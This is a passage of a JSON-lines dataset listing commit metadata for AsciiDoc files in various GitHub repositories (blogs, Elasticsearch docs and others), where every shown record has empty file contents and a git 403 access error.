/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,winstonewert\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,StefanGor\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,rlugojr\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,IanvsPoplicola\/elasticsearch,brandonkearby\/elasticsearch,mikemccand\/elasticsearch,MaineC\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,fred84\/elasticsearch,spiegela\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,markwalkom\/elasticsearch,spiegela\/elasticsearch,spiegela\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,bawse\/elasticsearch,elasticdog\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,masaruh\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch","old_file":"docs\/reference\/docs\/get.asciidoc","new_file":"docs\/reference\/docs\/get.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"071c0c7a143f3306a43c948d09299b3d2694ecef","subject":"Update 2015-05-22-Episode-18-Two-and-Done.adoc","message":"Update 2015-05-22-Episode-18-Two-and-Done.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-05-22-Episode-18-Two-and-Done.adoc","new_file":"_posts\/2015-05-22-Episode-18-Two-and-Done.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72da6400792b093cc4e5aa16633a289261f1eab0","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd7925313b3d2184270e3970cfdeaa2093105f4c","subject":"Update 2015-04-20-Episode-17-Big-Nuts.adoc","message":"Update 2015-04-20-Episode-17-Big-Nuts.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-04-20-Episode-17-Big-Nuts.adoc","new_file":"_posts\/2015-04-20-Episode-17-Big-Nuts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd90814d9a687c8d3b5b0f22f6eb9e40d27bcba4","subject":"Update 2015-09-07-Herzlich-willkommen.adoc","message":"Update 2015-09-07-Herzlich-willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bf3be757ee43f976aa3dcf03b931b4544b7883b","subject":"Update Nov-11-2015-Hoka-One-One.adoc","message":"Update Nov-11-2015-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/Nov-11-2015-Hoka-One-One.adoc","new_file":"_posts\/Nov-11-2015-Hoka-One-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31184ae6ef29cbdf7187cb237ead176e2aafe5c","subject":"Update 2016-11-15-231000-Thursday-Morning.adoc","message":"Update 2016-11-15-231000-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Thursday-Morning.adoc","new_file":"_posts\/2016-11-15-231000-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e120e40465644251f684aeed6d11ea4a2176d8f","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09930b02abcf699910e2846bfbf1642c89a60be5","subject":"Update 2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","message":"Update 2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb0493a21cfa444e181ddcf0967a7c7ad03a2fc3","subject":"add spring integration doc","message":"add spring integration doc\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_spring.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3eb429dae7e279ad7b8149fa8fbed807b77825fe","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e0571bef23bab8ffdc05a1599b57c4e5e9e0bd4","subject":"Update 2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","message":"Update 2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","new_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e0eed322be6cfdbf7ced406b93c6fd413528643","subject":"Update 2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","message":"Update 2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","new_file":"_posts\/2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03d09d0287c9ee5880af8a91d06acb41962a2ce8","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"becd5e355fe563b8659086e4f80cf2e96dc68f60","subject":"y2b create post PlayStation 3D Display Unboxing \\u0026 Review","message":"y2b create post PlayStation 3D Display Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-13-PlayStation-3D-Display-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-11-13-PlayStation-3D-Display-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"486b5446be62aaa61be91a32ff375710e5ba6c55","subject":"y2b create post The Tiny Snack Gadget You Need To Know About","message":"y2b create post The Tiny Snack Gadget You Need To Know About","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-11-The-Tiny-Snack-Gadget-You-Need-To-Know-About.adoc","new_file":"_posts\/2016-08-11-The-Tiny-Snack-Gadget-You-Need-To-Know-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26c65f53cddd834bc3ac5c42b851d70fe7cb14c3","subject":"Update 2015-11-10-Article-Test.adoc","message":"Update 2015-11-10-Article-Test.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-10-Article-Test.adoc","new_file":"_posts\/2015-11-10-Article-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"810602b536e894206f7fbfef5bb29cb91eaae711","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330105084a7a5fa21069972c2b1c3325d8c4e5e4","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"990f81dff6a9d3843b40bba95cd84a3f5b91de02","subject":"Update 2017-01-10-i-O-S-1890000.adoc","message":"Update 2017-01-10-i-O-S-1890000.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-01-10-i-O-S-1890000.adoc","new_file":"_posts\/2017-01-10-i-O-S-1890000.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a47189a275a53f6a6e0aa67790b98a756d8ea6","subject":"y2b create post Vestal Observer Watch Unboxing \\u0026 Overview","message":"y2b create post Vestal Observer Watch Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-21-Vestal-Observer-Watch-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-21-Vestal-Observer-Watch-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf3d9456bdb29c19ae93467a30e4fae15b6ba458","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a52cedeeb10cbfc1f26bc620e1b738ded1204f5","subject":"y2b create post This Gadget Claims To Make You A Better Gamer...","message":"y2b create post This Gadget Claims To Make You A Better Gamer...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-12-This-Gadget-Claims-To-Make-You-A-Better-Gamer.adoc","new_file":"_posts\/2016-11-12-This-Gadget-Claims-To-Make-You-A-Better-Gamer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b413cc8fd4abf09897d62afe98f61c793e48d6","subject":"add intro to architecture","message":"add intro to architecture\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Architectue.adoc","new_file":"docs\/Architectue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"41b3b5bfb965b241cd331186d679c4be6a7fcfe1","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0996ba6eb478276948a1d2232fdc6f085da3641d","subject":"Changed headlines, h1 was broken on the rendered site","message":"Changed headlines, h1 was broken on the rendered site\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"docs\/opcodes.asciidoc","new_file":"docs\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20f9d83fc761c3838cc36b0e2782b44bb704ad63","subject":"Update 2016-10-18-Heroku-MongoDB.adoc","message":"Update 2016-10-18-Heroku-MongoDB.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-10-18-Heroku-MongoDB.adoc","new_file":"_posts\/2016-10-18-Heroku-MongoDB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ece309eeac5b96bfa1421ca9e5b78cb8fd387c","subject":"Update 2018-12-14-Metabase-K-P-I.adoc","message":"Update 2018-12-14-Metabase-K-P-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676e2caafde4d05eab6bae293cf66831adb416ae","subject":"y2b create post Limited Edition Xbox 360 Kinect Star Wars Bundle Unboxing","message":"y2b create post Limited Edition Xbox 360 Kinect Star Wars Bundle Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-04-Limited-Edition-Xbox-360-Kinect-Star-Wars-Bundle-Unboxing.adoc","new_file":"_posts\/2012-04-04-Limited-Edition-Xbox-360-Kinect-Star-Wars-Bundle-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92cddd8c320e9a20b9388bc338cd029ce89b6aec","subject":"URLs redirect","message":"URLs redirect\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc171458b89817b4c5e749fbcf284320bad99171","subject":"Added libcryptohost description","message":"Added libcryptohost description\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/libcryptohost.adoc","new_file":"doc\/manpage\/libcryptohost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e54c61ec623e08ca60d744e7ad88930cefcdf13f","subject":"add information where to find the mongodb jar files, fixes #265","message":"add information where to find the mongodb jar files, fixes #265\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"748eb61c9f165acfde3fcffd5a2dbf83211fe810","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0786f36fe728e21cdf07e6c0411265e1b5b981f6","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 